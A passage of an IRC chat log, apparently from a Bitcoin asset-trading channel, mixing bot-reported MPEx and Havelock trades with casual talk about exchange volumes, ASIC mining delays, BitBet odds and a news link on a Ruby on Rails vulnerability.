23:22:30 i think it was 5850 Jan 08 23:22:32 Might still have made more people buy the AMD/ATI newest card because of scarcity of older cards. Jan 08 23:22:47 [MPEX] [S.MPOE] 20994 @ 0.00064374 = 13.5147 BTC [+] Jan 08 23:22:49 [MPEX] [S.MPOE] 9198 @ 0.00064467 = 5.9297 BTC [+] Jan 08 23:22:50 [MPEX] [S.MPOE] 18254 @ 0.00065576 = 11.9702 BTC [+] Jan 08 23:22:51 [MPEX] [S.MPOE] 15117 @ 0.00065613 = 9.9187 BTC [+] Jan 08 23:22:52 [MPEX] [S.MPOE] 3762 @ 0.00065643 = 2.4695 BTC [+] Jan 08 23:22:53 [MPEX] [S.MPOE] 23300 @ 0.0006569 = 15.3058 BTC [+] Jan 08 23:22:54 [MPEX] [S.MPOE] 27700 @ 0.00065738 = 18.2094 BTC [+] Jan 08 23:22:55 [MPEX] [S.MPOE] 20100 @ 0.00065987 = 13.2634 BTC [+] Jan 08 23:22:56 [MPEX] [S.MPOE] 4000 @ 0.00065998 = 2.6399 BTC [+] Jan 08 23:22:57 [MPEX] [S.MPOE] 11000 @ 0.00065999 = 7.2599 BTC [+] Jan 08 23:22:58 [MPEX] [S.MPOE] 3846575 @ 0.00066 = 2538.7395 BTC [+] Jan 08 23:22:59 lol Jan 08 23:23:01 LOL WOT Jan 08 23:23:22 fuckin dog. Jan 08 23:23:49 over 2500+ btc on S.MPOE Jan 08 23:24:01 you act like that's news lol Jan 08 23:24:33 Well such large trades have happened for S.DICE/S.MPOE before. Jan 08 23:24:46 I think that was one of your blocks mircea? Jan 08 23:24:54 Well congrats. Jan 08 23:25:06 not bad Jan 08 23:25:13 yeah like the 2nd Jan 08 23:25:25 actually 3rd Jan 08 23:25:28 Not bad? Still more than I make in a year. Jan 08 23:25:33 2.4 down Jan 08 23:25:37 2.6 to go Jan 08 23:25:39 mircea_popescu: isn't it, then? Jan 08 23:25:40 Although mircea is not alone on MPEx. Jan 08 23:25:45 !ticker s.mpoe Jan 08 23:25:46 [MPEX:S.MPOE] 1day: 0.00063085 / 0.00065692 / 0.00066 (4741455 shares, 3,114.78 BTC), 30day: 0.0005119 / 0.00061439 / 0.00066 (56821188 shares, 34,910.39 BTC) Jan 08 23:25:57 but no, s.dice has the record, i think it had 13k in one day or something like that Jan 08 23:26:07 more than you make in a year? Jan 08 23:26:07 4 million shares Jan 08 23:26:07 wut Jan 08 23:26:09 then again the options often do 5-10k too Jan 08 23:26:16 thats like minimum wage Jan 08 23:26:36 i think he lives in europe Jan 08 23:26:41 no wait, canadian Jan 08 23:26:48 ;;calc 4100000 * .0037 Jan 08 23:26:48 15170 Jan 08 23:28:07 on the ticker, whast the middle number? the average? day: 0.00063085 / 0.00065692 / 0.00066 Jan 08 23:28:41 vwap yea Jan 08 23:29:29 (trying to make my havelock ticker api provide the same stats) Jan 08 23:29:54 topace isn't fascinating what stuff was going on in the folds of the interwebs. Jan 08 23:30:18 [MPEX] [S.DICE] 3100 @ 0.00478699 = 14.8397 BTC [+] Jan 08 23:31:59 [MPEX] [S.DICE] 1763 @ 0.00470028 = 8.2866 BTC [-] Jan 08 23:32:00 [MPEX] [S.DICE] 306 @ 0.00469615 = 1.437 BTC [-] Jan 08 23:32:02 [MPEX] [S.DICE] 2450 @ 0.00468918 = 11.4885 BTC [-] Jan 08 23:32:03 [MPEX] [S.DICE] 1300 @ 0.0046843 = 6.0896 BTC [-] Jan 08 23:32:04 [MPEX] [S.DICE] 1269 @ 0.00467785 = 5.9362 BTC [-] Jan 08 23:32:04 [MPEX] [S.DICE] 1900 @ 0.00467139 = 8.8756 BTC [-] Jan 08 23:32:05 [MPEX] [S.DICE] 5556 @ 0.00466476 = 25.9174 BTC [-] Jan 08 23:32:07 [MPEX] [S.DICE] 3300 @ 0.00465281 = 15.3543 BTC [-] Jan 08 23:32:08 [MPEX] [S.DICE] 1800 @ 0.00465075 = 8.3714 BTC [-] Jan 08 23:32:08 shit Jan 08 23:32:09 [MPEX] [S.DICE] 5100 @ 0.00462952 = 23.6106 BTC [-] Jan 08 23:32:10 [MPEX] [S.DICE] 300 @ 0.0045941 = 1.3782 BTC [-] Jan 08 23:32:11 [MPEX] [S.DICE] 3089 @ 0.00458277 = 14.1562 BTC [-] Jan 08 23:32:12 [MPEX] [S.DICE] 1876 @ 0.00453281 = 8.5036 BTC [-] Jan 08 23:32:13 [MPEX] [S.DICE] 3127 @ 0.00453272 = 14.1738 BTC [-] Jan 08 23:32:14 [MPEX] [S.DICE] 2550 @ 0.00452446 = 11.5374 BTC [-] Jan 08 23:32:14 [MPEX] [S.DICE] 500 @ 0.00451308 = 2.2565 BTC [-] Jan 08 23:32:15 [MPEX] [S.DICE] 1162 @ 0.0045121 = 5.2431 BTC [-] Jan 08 23:32:16 [MPEX] [S.DICE] 1000 @ 0.00450869 = 4.5087 BTC [-] Jan 08 23:32:17 [MPEX] [S.DICE] 3550 @ 0.00450124 = 15.9794 BTC [-] Jan 08 23:32:18 [MPEX] [S.DICE] 33102 @ 0.00449 = 148.628 BTC [-] Jan 08 23:33:00 sweet. My bid got hit Jan 08 23:33:15 LOVE when your bid is the last bid hit in a dump Jan 08 23:33:23 lol Jan 08 23:33:33 showstopper. Jan 08 23:33:40 dub, 2538.7395 BTC is more than I make in a year. Jan 08 23:33:42 glad I moved it down from 469 Jan 08 23:33:52 Namworld: Sorry man Jan 08 23:33:57 How old? Jan 08 23:34:00 Nam? Jan 08 23:34:05 22 Jan 08 23:34:07 yah Jan 08 23:34:08 well Jan 08 23:34:12 that will change Jan 08 23:34:20 yes, everyone gets older. Jan 08 23:34:25 lol Jan 08 23:34:26 although coins will probably go up faster Jan 08 23:34:27 xD Jan 08 23:34:33 40k or so isn't the worst at 22. Jan 08 23:34:42 its not bad at all Jan 08 23:34:50 I said I make less than that. Jan 08 23:34:52 heh Jan 08 23:35:18 Which is 35k Jan 08 23:35:32 How much I won't disclose. =P Jan 08 23:35:32 !ticker s.dice Jan 08 23:35:34 [MPEX:S.DICE] 1day: 0.00449 / 0.00470376 / 0.0047888 (516619 shares, 2,430.06 BTC), 30day: 0.0014 / 0.00339243 / 0.0048 (13849441 shares, 46,983.26 BTC) Jan 08 23:37:46 ;;calc 0.00470376 / 0.00339243 Jan 08 23:37:47 1.38654592726 Jan 08 23:37:51 frightening Jan 08 23:38:09 ;;calc 1.07 ** 4.2 Jan 08 23:38:10 1.32865389886 Jan 08 23:38:16 MOAR. it is moar. Jan 08 23:39:00 hah Jan 08 23:41:06 Wow, I just placed an order on bitmit last night and I now have "no permission" to view the order, after paying. Were my funds taken by the new owner or something? Jan 08 23:41:13 can't tell if troll or... Jan 08 23:42:52 [MPEX] [S.DICE] 2650 @ 0.00449 = 11.8985 BTC [-] Jan 08 23:43:01 [HAVELOCK] [SDICE] 2 @ 0.48 = 0.96 BTC [-] Jan 08 23:45:22 !ticker S.MPOE Jan 08 23:45:24 [MPEX:S.MPOE] 1day: 0.00063085 / 0.00065692 / 0.00066 (4741455 shares, 3,114.78 BTC), 30day: 0.0005119 / 0.00061448 / 0.00066 (56765738 shares, 34,881.43 BTC) Jan 08 23:49:53 [MPEX] [S.DICE] 1450 @ 0.00466507 = 6.7644 BTC [+] Jan 08 23:49:55 [MPEX] [S.DICE] 360 @ 0.00467005 = 1.6812 BTC [+] Jan 08 23:55:33 [MPEX] [S.DICE] 1800 @ 0.00478699 = 8.6166 BTC [+] Jan 08 23:58:50 [MPEX] [S.DICE] 336 @ 0.0047582 = 1.5988 BTC [-] Jan 08 23:59:46 [HAVELOCK] [SDICE] 10 @ 0.48 = 4.8 BTC [-] Jan 09 00:04:12 [MPEX] [S.DICE] 2100 @ 0.00477613 = 10.0299 BTC [+] Jan 09 00:04:13 [MPEX] [S.DICE] 1300 @ 0.0047582 = 6.1857 BTC [-] Jan 09 00:04:39 [HAVELOCK] [SDICE] 8 @ 0.48 = 3.84 BTC [-] Jan 09 00:05:39 0_o Jan 09 00:06:08 nice to see more things in the ass Jan 09 00:06:31 wat Jan 09 00:06:44 22:04 <@assbot> [HAVELOCK] [SDICE] 8 @ 0.48 = 3.84 BTC [-] Jan 09 00:13:00 [MPEX] [S.DICE] 296 @ 0.0047582 = 1.4084 BTC [-] Jan 09 00:14:10 mircea_popescu: u from wut country? Jan 09 00:14:30 i from my country which is romania Jan 09 00:14:45 i'm just telling irl friend about you and MPEX and how much one can make btc in a month by owning such exchange Jan 09 00:14:45 [MPEX] [O.BTCUSD.C120T] 1 @ 0.16091948 BTC [-] Jan 09 00:14:57 [MPEX] [O.BTCUSD.P120T] 1 @ 0.0647318 BTC [-] Jan 09 00:15:09 [MPEX] [O.BTCUSD.C130T] 1 @ 0.132 BTC [-] Jan 09 00:15:25 [MPEX] [O.BTCUSD.P130T] 1 @ 0.09130116 BTC [-] Jan 09 00:15:41 lol Jan 09 00:15:42 [MPEX] [O.BTCUSD.C140T] 1 @ 0.1 BTC [-] Jan 09 00:15:44 not "one" tho. Jan 09 00:15:50 well Jan 09 00:15:55 don't you own like 800k of S.MPOE? Jan 09 00:15:55 [MPEX] [O.BTCUSD.P140T] 1 @ 0.12379657 BTC [-] Jan 09 00:15:56 or 900k Jan 09 00:16:02 but i'm not "one", i'm me. Jan 09 00:16:08 others have tried and it worked a little worse. Jan 09 00:16:10 yes yes, Jan 09 00:16:12 me is me , you is you Jan 09 00:16:20 Mircea is not alone working on MPEx... Jan 09 00:16:30 Namworld: who coded mpe? Jan 09 00:16:31 x Jan 09 00:16:32 * Jan 09 00:16:32 He got a small team of unkown size Jan 09 00:16:34 aight Jan 09 00:16:34 nobody is really ever alone. Jan 09 00:16:43 Anduck tis in the faq. Jan 09 00:16:56 [MPEX] [S.DICE] 1800 @ 0.00463954 = 8.3512 BTC [-] Jan 09 00:16:58 one of these days you should splurge 20 bitcoins' worth of reading and read the faq lol Jan 09 00:16:58 [MPEX] [S.DICE] 4348 @ 0.00459059 = 19.9599 BTC [-] Jan 09 00:17:46 it might cause brain damage, though Jan 09 00:18:15 maybe it cauyses brain fixage, how do you know. Jan 09 00:18:38 never know... Jan 09 00:19:03 how many mpex-like exchanges there is? Jan 09 00:19:10 is mpex just another brick in the wall? Jan 09 00:19:29 there's about half a dozen, but mpex has 9x% of the volume Jan 09 00:19:38 cool Jan 09 00:19:42 sorta mtgox like situation Jan 09 00:19:51 yup Jan 09 00:20:06 which was bigger at the end of glbse, mpex or glbse? Jan 09 00:20:29 MPEx Jan 09 00:20:42 (btw, nobody was enough as to notice my PF-references??) Jan 09 00:20:51 is it S.DICE that makes it bigger, only? Jan 09 00:21:03 what's pf ? Jan 09 00:21:08 pink floyd Jan 09 00:21:10 Anduck s.mpoe is actually larger. Jan 09 00:21:19 mircea_popescu: s.mpoe wouldnt be without S.DICE... Jan 09 00:21:20 duh Jan 09 00:21:24 mircea_popescu: how about those mpex futures Jan 09 00:21:31 there wouldnt be S.MPOE if there was no S.DICE, right, mircea_popescu? Jan 09 00:21:35 s.mpoe was larger when s.dice ipoed, too Jan 09 00:21:36 not all that popular, it seems Jan 09 00:21:50 smickles dead huh. Jan 09 00:22:23 [MPEX] [O.BTCUSD.C120T] 1 @ 0.16089199 BTC [-] Jan 09 00:22:36 [MPEX] [O.BTCUSD.P120T] 1 @ 0.06470431 BTC [-] Jan 09 00:22:41 actually mpex trade record was sometime in september, just about when glbse was crashing Jan 09 00:22:47 mircea_popescu: a problem with them is that btc are expected to rise, so buying those futures is like cashing out of btc Jan 09 00:22:48 it did something under 200k in trade then Jan 09 00:23:00 smickles i know, i know. Jan 09 00:23:02 what's one to do. Jan 09 00:23:16 if the options were cheaper, it might work Jan 09 00:23:25 as if you could pull that off tho Jan 09 00:23:55 the real macro problem here is that because btc and fiat are so badly decoupled Jan 09 00:24:05 any non-btc/fiat signal is drowned Jan 09 00:24:34 i guess in a backwards way the futures uptake is a measure of btc/fiat decouplement. Jan 09 00:24:56 [MPEX] [S.DICE] 650 @ 0.00461461 = 2.9995 BTC [+] Jan 09 00:24:58 [MPEX] [S.DICE] 350 @ 0.00459059 = 1.6067 BTC [-] Jan 09 00:31:04 [MPEX] [S.DICE] 2300 @ 0.00468211 = 10.7689 BTC [+] Jan 09 00:40:38 [MPEX] [S.DICE] 1986 @ 0.00459059 = 9.1169 BTC [-] Jan 09 00:43:58 [MPEX] [S.MPOE] 9750 @ 0.0006446 = 6.2849 BTC [-] Jan 09 00:43:59 [MPEX] [S.MPOE] 156750 @ 0.00066 = 103.455 BTC [+] Jan 09 00:57:38 [MPEX] [S.DICE] 1689 @ 0.00449001 = 7.5836 BTC [-] Jan 09 00:59:09 "I will tell you a secret: Dealmaking Jan 09 00:59:09 beats working. Dealmaking is exciting and fun, and working is Jan 09 00:59:09 grubby. Running anything is primarily an enormous amount of Jan 09 00:59:09 grubby detail work . . . dealmaking is romantic, sexy. That's Jan 09 00:59:09 why you have deals that make no sense." Jan 09 00:59:12 hehe Jan 09 01:00:33 reminds me of http://xkcd.com/1060/ Jan 09 01:02:45 heheh Jan 09 01:02:45 [MPEX] [S.DICE] 3442 @ 0.00449001 = 15.4546 BTC [-] Jan 09 01:05:09 omg.. when i finally stop being addicted to trash like http://www.youtube.com/watch?v=BLBJ1geMNJc Jan 09 01:06:35 kakobrekla that's why you have a bunch of sitcom people doing "entrepreneurship" rutines these days. Jan 09 01:06:41 that misrepresentation. Jan 09 01:06:47 jurov: pass me a glo stick Jan 09 01:07:10 *----* Jan 09 01:07:15 hahahah Jan 09 01:08:46 http://xkcd.com/150/ Jan 09 01:10:23 http://xkcd.com/153/ Jan 09 01:10:46 btw, that quote is from Buffets shareholder letter Jan 09 01:12:02 many years ago iirc Jan 09 01:12:11 95 Jan 09 01:14:22 [MPEX] [S.DICE] 1900 @ 0.00450904 = 8.5672 BTC [+] Jan 09 01:14:23 [MPEX] [S.DICE] 314 @ 0.0045325 = 1.4232 BTC [+] Jan 09 01:14:26 [MPEX] [S.DICE] 1508 @ 0.00457957 = 6.906 BTC [+] Jan 09 01:18:33 !ticker s.dice Jan 09 01:18:34 [MPEX:S.DICE] 1day: 0.00449 / 0.00469837 / 0.0047888 (544375 shares, 2,557.68 BTC), 30day: 0.0014 / 0.0033951 / 0.0048 (13880020 shares, 47,124.18 BTC) Jan 09 01:18:41 [MPEX] [S.DICE] 239 @ 0.00468211 = 1.119 BTC [+] Jan 09 01:18:43 [MPEX] [S.DICE] 1361 @ 0.00472449 = 6.43 BTC [+] Jan 09 01:19:35 http://www.youtube.com/embed/5ZUPniBo5UQ Jan 09 01:19:46 New BFL chassis Jan 09 01:20:27 The BIGGEST NEWS at BFL @ CES is.... Android mining software Jan 09 01:20:53 uh Jan 09 01:21:09 did they get hot chicks at least ? Jan 09 01:21:39 no Jan 09 01:22:33 realy? Jan 09 01:22:56 wtf is the point Jan 09 01:24:55 Looks like their mini rig SC demo is gettin 980MH/s Jan 09 01:25:02 Bitcoin Flakes Laboratories consist of a solitary man with a messy apartment which may or may not contain a chicken. Jan 09 01:25:04 no chicks. Jan 09 01:26:30 oh... its an FPGA single Jan 09 01:27:16 lol wtf are they gonna resell rooted nexuses Jan 09 01:29:07 i would guess the battery cost would make phone mining impossible Jan 09 01:29:09 [HAVELOCK] [SDICE] 50 @ 0.48 = 24 BTC [-] Jan 09 01:30:18 i do not have idea Jan 09 01:30:18 they can mine while charging Jan 09 01:30:24 why they dont use some cheap chinese tabs... Jan 09 01:30:28 ainol novo 7's Jan 09 01:30:45 or decommissioned 386's Jan 09 01:30:46 [MPEX] [S.DICE] 3907 @ 0.00458881 = 17.9285 BTC [-] Jan 09 01:30:52 they could even resell them with permission as a part of their own product Jan 09 01:33:33 wtf... [HAVELOCK] [SDICE] 50 @ 0.48 = 24 BTC [-] Jan 09 01:33:51 ;;google error3477 Jan 09 01:33:51 mistake ? Jan 09 01:33:52 Commander Books List - kellysComics: ; PRB: Error "The Jet VBA File...Failed to Initialize When Called": ; 3477 East Sheffield Gilbert AZ, abetterrealty.net - YouTube: Jan 09 01:34:09 error3477 it's a passthrough Jan 09 01:34:21 error3477 that's their passthrough 1000 S.DICE:1 Jan 09 01:34:41 ook :) Jan 09 01:35:01 wait Jan 09 01:35:14 it's trading 10% of mpex price ?! Jan 09 01:35:20 [MPEX] [S.DICE] 2975 @ 0.00472449 = 14.0554 BTC [+] Jan 09 01:35:21 omg buy ? Jan 09 01:35:53 no sry, it's 100:1 Jan 09 01:38:19 when assbot will report sdice pt's from btct&bitfunder...now that will be hilarious Jan 09 01:40:51 S.DICE to rule them all, S.DICE to find them, S.DICE to bring them all and in the darkness bind them Jan 09 01:41:20 [MPEX] [S.DICE] 2900 @ 0.00466745 = 13.5356 BTC [-] Jan 09 01:43:20 [MPEX] [S.DICE] 64 @ 0.00472449 = 0.3024 BTC [+] Jan 09 01:43:22 [MPEX] [S.DICE] 4936 @ 0.00478699 = 23.6286 BTC [+] Jan 09 01:46:28 [MPEX] [S.DICE] 1200 @ 0.00466745 = 5.6009 BTC [-] Jan 09 01:46:29 [MPEX] [S.DICE] 349 @ 0.00466042 = 1.6265 BTC [-] Jan 09 01:55:51 wats with the hashrate variance on that BFL 'roid Jan 09 01:56:19 72TH mine is canceled Jan 09 01:56:19 high ambient at CES making it throttle Jan 09 01:56:19 hehe Jan 09 01:56:31 [MPEX] [S.DICE] 2400 @ 0.00466042 = 11.185 BTC [-] Jan 09 01:57:51 dub: huh? Jan 09 01:58:05 they have a working prototype at CES? Jan 09 01:58:09 no Jan 09 01:58:18 they have an android bfgminer skin Jan 09 01:58:29 ahh Jan 09 01:58:33 [18:19] http://www.youtube.com/embed/5ZUPniBo5UQ Jan 09 01:58:49 and a rig chassis with a nexus 7 on the front Jan 09 02:01:05 [HAVELOCK] [SDICE] 5 @ 0.48 = 2.4 BTC [-] Jan 09 02:12:06 [MPEX] [S.DICE] 900 @ 0.00478696 = 4.3083 BTC [+] Jan 09 02:18:02 HAVELOCK ? Jan 09 02:18:17 HAVEGUN? Jan 09 02:18:38 this bASIC drama is a bit overwhelming Jan 09 02:18:42 what drama? Jan 09 02:18:46 quite Jan 09 02:18:46 the march shipping Jan 09 02:18:47 ? Jan 09 02:18:52 just starting idling in there Jan 09 02:18:58 okay i ask this again: who Jan 09 02:18:59 is Jan 09 02:19:00 firsy? Jan 09 02:19:01 *t Jan 09 02:19:23 who's first shipping asics out or mining with them? Jan 09 02:19:25 lol what drama Jan 09 02:19:35 nobody yet Jan 09 02:19:40 no asics Jan 09 02:19:42 but who will be Jan 09 02:19:42 ? Jan 09 02:19:45 asics are never coming Jan 09 02:19:53 BFL hopefully Jan 09 02:19:53 ASICs are never coming..? Jan 09 02:20:06 hopefully.. but who realistically? Jan 09 02:20:13 no clue Jan 09 02:20:24 i got no rigs ordered from anywhere Jan 09 02:20:30 except i got a few asicminer shares Jan 09 02:20:33 avalon is now saying they don't know how much is going to ship before cny Jan 09 02:20:45 wo Jan 09 02:20:48 they delaying too? Jan 09 02:20:56 asicminer still has a month to get theirs up Jan 09 02:21:12 mm Jan 09 02:21:13 basic is under the bus with all of their customers upset Jan 09 02:21:17 yup Jan 09 02:21:22 BFL is silent Jan 09 02:21:26 but u gotta admit that the notification was shiit Jan 09 02:21:28 yah asicminer has the best model for not delivering./ Jan 09 02:21:34 why? Jan 09 02:21:51 i think asicminer 'll be first Jan 09 02:21:59 atleast theyve gave pics of some chips Jan 09 02:22:03 (might be asic, might be not) Jan 09 02:22:45 that's besides rthe point. Jan 09 02:22:51 if nobody delivers chips they're in the best position Jan 09 02:23:00 cause at least they don't have a bunch of customers pissy Jan 09 02:23:07 they have a bunch of "shareholders" Jan 09 02:26:50 somebody in #bitcoin a few hours ago said they got an email from BFL yesterday quoting a march ship Jan 09 02:26:58 mircea_popescu just like you have an "exchange" with "shareholders" Jan 09 02:27:05 not at all. Jan 09 02:27:20 i was being sarcastic Jan 09 02:27:21 lol Jan 09 02:27:24 long day Jan 09 02:27:41 teh ppl with asicminer shares get pissed off what are they gonna do ? sell on forum ? Jan 09 02:28:26 file mpex suit Jan 09 02:28:33 lol right Jan 09 02:28:37 does the guy even have a signature ? Jan 09 02:28:38 rota court is in session Jan 09 02:28:57 o hey, lots of nfl action on bitbet. whodda thunk it. Jan 09 02:29:09 prolly not, he named himself after his fav food Jan 09 02:29:26 hey gigavps, how long till your lawyer answers? Jan 09 02:29:33 [MPEX] [S.DICE] 354 @ 0.00473087 = 1.6747 BTC [-] Jan 09 02:29:34 [MPEX] [S.DICE] 2496 @ 0.00476298 = 11.8884 BTC [+] Jan 09 02:29:35 He's pretty silent. Jan 09 02:29:36 Bet: Falcons makes it to the super bowl Jan 09 02:31:17 I havent looked and don't have keys handy, is coinbr letting us place bitbet orders for the IPO? Jan 09 02:31:29 was there a UFO sighting? Jan 09 02:31:58 ;;seen smickles Jan 09 02:31:58 smickles was last seen in #bitcoin-assets 2 hours, 8 minutes, and 33 seconds ago: as if you could pull that off tho Jan 09 02:32:14 dub, yes Jan 09 02:32:31 jurov: cool, thanks Jan 09 02:32:55 looks like it's gonna sell out that. Jan 09 02:33:24 dub, if you want to fund, hurry. Jan 09 02:33:31 at what price Jan 09 02:33:47 i'll go to sleep, then before i wake up, mircea will go to sleep, etc. Jan 09 02:33:47 jurov: still 2 days away from IPO no? Jan 09 02:34:10 mircea_popescu: what are IPO prices for S.BitBet Jan 09 02:34:19 yeash, we'll manage to get the funds in place till that Jan 09 02:34:58 !ticker S.BVPS Jan 09 02:34:59 [MPEX:S.BVPS] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.00200003 / 0.0034158 / 0.0067 (14758 shares, 50.41 BTC) Jan 09 02:35:09 thestringpuller a little more complex system, it's in teh contract. Jan 09 02:35:19 http://bitbet.us/bet/2/ lmao @ discussion. Jan 09 02:35:25 tru anonimity! Jan 09 02:36:22 Boromir Jan 09 02:36:24 One does not simply crash into MPEx Jan 09 02:36:24 heh Jan 09 02:37:00 I take it the third comment is suggesting if MPOE is goes so does btc Jan 09 02:37:11 s/is// Jan 09 02:37:33 cat comments | sed Jan 09 02:37:52 dub i like the odds tho. it's like... 300:1 but "we win nothing" Jan 09 02:37:57 dawg... Jan 09 02:39:17 dude that captcha is HARD Jan 09 02:39:28 mhm. Jan 09 02:39:48 roman numerals, what is this, junior school Jan 09 02:40:53 yes. Jan 09 02:40:56 literally. Jan 09 02:41:34 mr. popescu Jan 09 02:41:41 option Jan 09 02:41:43 emporium Jan 09 02:41:48 I get it Jan 09 02:41:53 like da movie Jan 09 02:42:49 what movie ? Jan 09 02:43:47 mircea_popescu Jan 09 02:43:52 u all day at comp? Jan 09 02:44:06 depends. Jan 09 02:44:12 2nd: Jan 09 02:44:18 why is there no clear odds? Jan 09 02:45:13 at bitbetus Jan 09 02:45:42 "clear odds" means what ? Jan 09 02:46:29 like.. Jan 09 02:46:37 1.54 / 1.34 Jan 09 02:46:49 u win ur bet 1.54 times Jan 09 02:46:55 on yes Jan 09 02:46:57 and 1.34 on no Jan 09 02:47:00 http://bitbet.us/bet/27/ Jan 09 02:47:04 1.01 : 20.08 Jan 09 02:47:06 mr. magoos wonderful emporium or something Jan 09 02:47:06 seems pretty clear Jan 09 02:47:35 well Jan 09 02:47:47 it doesnt say clearly how much you win if you bet x amount Jan 09 02:47:50 i mean.. Jan 09 02:47:54 there's no multiplier!!! Jan 09 02:48:00 it's mutual betting. Jan 09 02:48:13 should state like Yes: 1.35, No: 1.679whatevr Jan 09 02:48:21 that's line betting. Jan 09 02:48:30 ok Jan 09 02:48:30 i can't believe people's reaction is "we should be stolen from". Jan 09 02:48:41 dude. the absence of a bookie means you're not being fucked in the ass. Jan 09 02:53:34 I demand an assfucking! Jan 09 02:55:15 jus for you http://polimedia.us/dtng/c/src/135762166366.jpg Jan 09 02:55:27 im sure thats sfw Jan 09 02:55:33 let me click right on that Jan 09 02:55:54 its not sfw. Jan 09 02:56:03 nowai Jan 09 02:56:08 honest. Jan 09 02:57:04 [MPEX] [S.DICE] 754 @ 0.00476298 = 3.5913 BTC [+] Jan 09 02:57:05 [MPEX] [S.DICE] 736 @ 0.00478696 = 3.5232 BTC [+] Jan 09 03:06:15 meanwhile back at glbse headquarters http://pjmedia.com/blog/did-obama-and-holder-scuttle-terror-finance-prosecutions/ Jan 09 03:06:55 [MPEX] [S.DICE] 1100 @ 0.00467325 = 5.1406 BTC [-] Jan 09 03:25:59 [MPEX] [S.DICE] 222 @ 0.00467325 = 1.0375 BTC [-] Jan 09 03:27:30 [MPEX] [S.MPOE] 2400 @ 0.00065877 = 1.581 BTC [-] Jan 09 03:33:53 rails gets railed http://arstechnica.com/security/2013/01/extremely-crtical-ruby-on-rails-bug-threatens-more-than-200000-sites/ Jan 09 03:33:53 [MPEX] [S.DICE] 1500 @ 0.00478696 = 7.1804 BTC [+] Jan 09 03:35:47 lo Jan 09 03:41:29 [MPEX] [S.DICE] 400 @ 0.00478247 = 1.913 BTC [-] Jan 09 03:45:15 [MPEX] [S.DICE] 1051 @ 0.00471275 = 4.9531 BTC [-] Jan 09 03:45:17 [MPEX] [S.DICE] 383 @ 0.00467325 = 1.7899 BTC [-] Jan 09 03:53:52 heh. Jan 09 03:54:11 [MPEX] [S.DICE] 376 @ 0.00467325 = 1.7571 BTC [-] Jan 09 03:54:12 [MPEX] [S.DICE] 1043 @ 0.00466765 = 4.8684 BTC [-] Jan 09 03:54:13 [MPEX] [S.DICE] 31 @ 0.00466042 = 0.1445 BTC [-] Jan 09 03:58:48 mpex safety announcement : mpex uses no ruby on rails or anything else at all. Jan 09 03:58:52 dun dun dun. Jan 09 03:59:31 vim: the one true CMS Jan 09 03:59:39 and everything else. Jan 09 03:59:46 tho i think half of it is written in nano Jan 09 03:59:53 eww Jan 09 04:00:42 update their systems as soon as possible to versions 3.2.11, 3.1.10, 3.0.19, or 2.3.15 Jan 09 04:00:48 who the fuck is maintainijng that package lmao Jan 09 04:01:00 they have three stable 3's ? Jan 09 04:01:59 fuck this si some mind numbing shit Jan 09 04:02:05 building network records Jan 09 04:02:13 fuck. ing. sucks. Jan 09 04:05:06 lol Jan 09 04:06:42 ;;seen Ukto Jan 09 04:06:42 Ukto was last seen in #bitcoin-assets 1 day, 1 hour, 2 minutes, and 18 seconds ago: I was actually just thinking about contacting you Jan 09 04:10:49 heh, thestringpuller has been replaced by ;;seen-bot Jan 09 04:23:37 smickles: sup Jan 09 04:24:59 to whoever might be interested, you can now search bitbet by bitcoin address, and mix that with keywords etc Jan 09 04:27:40 thestringpuller: havent had a chance to test Jan 09 04:27:44 my computer tried to die Jan 09 04:27:51 besides Jan 09 04:27:58 it will take me a few days to test Jan 09 04:28:08 i think it will take at least 10hrs of play to get to disc2 Jan 09 04:30:42 Ukto: the original baldur's gate? Jan 09 04:31:09 there were 5 or 6 disks on that game Jan 09 04:32:54 ;;ticker Jan 09 04:32:54 BTCUSD ticker | Best bid: 13.80302, Best ask: 13.82999, Bid-ask spread: 0.02697, Last trade: 13.83000, 24 hour volume: 39611.17893164, 24 hour low: 13.55011, 24 hour high: 13.87998, 24 hour vwap: 13.73806 Jan 09 04:35:31 baldur gate was cool Jan 09 04:36:22 agreed, I find myself going back to it from time to time Jan 09 04:36:51 smickles: ff7 Jan 09 04:37:08 hadntl played bg in a long time Jan 09 04:55:16 [MPEX] [S.DICE] 1236 @ 0.00466572 = 5.7668 BTC [+] Jan 09 04:56:47 baldur's gate is nice. So is FF7 Jan 09 04:57:07 But I prefer FF6 Jan 09 04:58:41 Not really. They're not at the LVCC, but at the Sands Convention Centre. That's like half an hour away from the "real" CES. Jan 09 04:58:42 ouch. Jan 09 05:01:02 meanwhile in libertarianism http://www.politico.com/blogs/media/2013/01/the-deport-piers-morgan-creator-blows-up-on-cnn-153577.html?ml=po_r Jan 09 05:09:29 "What makes it possible to buy drugs with Tide is not because Tide is useful as a detergent. It’s because drug dealers and users have agreed that it is currency." Jan 09 05:09:33 forbes, now with extra esl. Jan 09 05:09:35 da fuck. Jan 09 05:10:04 why are people like this allowed to write ? Jan 09 05:14:22 [MPEX] [S.DICE] 1079 @ 0.0046899 = 5.0604 BTC [+] Jan 09 05:14:24 [MPEX] [S.DICE] 588 @ 0.00469194 = 2.7589 BTC [+] Jan 09 05:17:04 [MPEX] [S.DICE] 380 @ 0.00469194 = 1.7829 BTC [+] Jan 09 05:22:56 [MPEX] [S.DICE] 400 @ 0.00469194 = 1.8768 BTC [+] Jan 09 05:24:03 ;;bc,convert eur Jan 09 05:24:09 1 BTC = 13.75002 U.S. dollars = 10.5227061 Euros Jan 09 05:25:49 [MPEX] [S.DICE] 800 @ 0.00466572 = 3.7326 BTC [-] Jan 09 05:32:23 lol that alex guy Jan 09 05:32:31 a monkey is smarter than that. Jan 09 05:35:48 [MPEX] [S.DICE] 1150 @ 0.00468285 = 5.3853 BTC [+] Jan 09 05:41:13 mircea_popescu: yeah, that entire article is full of shit Jan 09 05:41:21 I read it earlier Jan 09 05:41:29 Tide _is_ useful as a detergent Jan 09 05:41:42 its the only one left on the market that they havent raped the forumula to Jan 09 05:42:15 [MPEX] [S.DICE] 264 @ 0.00466572 = 1.2318 BTC [-] Jan 09 05:42:16 [MPEX] [S.DICE] 308 @ 0.00466042 = 1.4354 BTC [-] Jan 09 05:47:22 Diablo-D3 http://trilema.com/2013/forbes-now-with-a-little-extra-esl-and-a-whole-lot-of-extra-stupid/ Jan 09 05:47:30 an' i hope he chokes on it. Jan 09 05:50:37 [MPEX] [S.MPOE] 5300 @ 0.00065877 = 3.4915 BTC [-] Jan 09 05:56:39 [MPEX] [S.DICE] 563 @ 0.00466042 = 2.6238 BTC [-] Jan 09 05:56:41 [MPEX] [S.DICE] 237 @ 0.00465713 = 1.1037 BTC [-] Jan 